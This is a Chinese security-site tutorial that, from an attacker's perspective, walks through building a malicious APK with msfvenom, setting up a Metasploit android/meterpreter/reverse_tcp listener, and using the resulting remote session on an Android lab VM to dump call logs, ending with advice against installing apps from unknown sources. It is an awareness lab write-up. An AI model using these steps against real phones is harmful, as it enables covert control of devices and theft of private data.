freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

如何使用Metasploit对安卓手机进行控制
2019-01-22 21:17:21

如何使用Metasploit对安卓手机进行控制

现在大家每天的生活都离不开一样东西——手机。手机上的App给我们的生活带来了许多欢乐与便利,让我们足不出户便能知晓天下事。然而,并不是所有App都是为我们服务的,有些App可能会带着恶意去接近我们。如果你的程序是从官方应用商店下载还比较安全,若是从未知来源,如网上论坛,或者他人转发等“不靠谱”的下载链接安装,那就比较危险了。所以大部分安卓手机在你设置“允许安装未知来源App”时都会弹出如下提醒:

图片.png别小看这一道“防护栏”,他有可能会替你挡下一波又一波恶意App的进攻。也许你可能会不以为然的关掉它:我只是装个App而已,它又不会偷我的钱。

下面,我就会以一个恶意攻击者的角度来告诉你,未知来源的App有多危险!

环境:

攻击机:Kali

靶机(受害者):FreeBSD安卓4.4.2虚拟机

过程:

首先我们查看并记录Kali的ip地址:192.168.1.112.

图片.png利用Kali下的msfvenom生成恶意APK,也就是安卓程序的安装包,LHOST为Kali的ip,LPORT可随意选择一个不用的端口。

图片.png成功生成一个apk,我们先把它放着。再启动metasploit的监听器,打开msfconsole控制台(吐槽一句,为什么好多Kali下的程序都搞这么花哨的欢迎界面,大佬的世界我不懂)。

图片.png打开后,分别输入:

use exploit/multi/handler

set Payload android/meterpreter/reverse_tcp

set LHOST 192.168.1.112

set LPORT 4444

图片.png这样,就设置好了攻击模块、Payload、接收反弹连接主机的监听端口等,便可以开始攻击了。

输入exploit,等待结果。

图片.png


现在,我们开始模仿受害者,通过电子邮件收到了一个未知来源的apk,名称为“hh.apk”。

图片.png开始安装,他并没有提示我“未知来源“,可能是因为这个安卓版本比较久远了,那时还没有现在这样的信息安全保护意识吧。

图片.png图片.png这样,安装完成,我们已经不知不觉的踏入了“攻击者“的陷阱中。点击应用程序,发现并没有什么响应。但其实,我们此时已经被攻击者掌控住了。

图片.png如图所示,就是受害者已经被监控的提示,图中192.168.1.100就是安卓机的ip地址。

图片.png在这个页面下,攻击者基本可以操控手机的全部功能、窃听或查看手机的全部文件。举个例子来说,上图中的“dump_call log“指令就是下载了安卓机的所有通话记录,并生成一个TXT文档。

图片.png这是我模拟手机,拨打三家通信运营商的通话记录,分别是10001、10086和10010。从图中可以清楚的看到拨打号码、通话时间与拨打接听方式。当然,能做的事远不止这些。

总结:

看到这里,相信各位已经对未知来源的应用程序产生了一丝畏惧。希望大家尽量能从官方下载应用程序使用,不要安装和使用来源不明的apk或是软件,对自己的信息安全有更多一点的防范意识。



# Metasploit # 未知APP
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者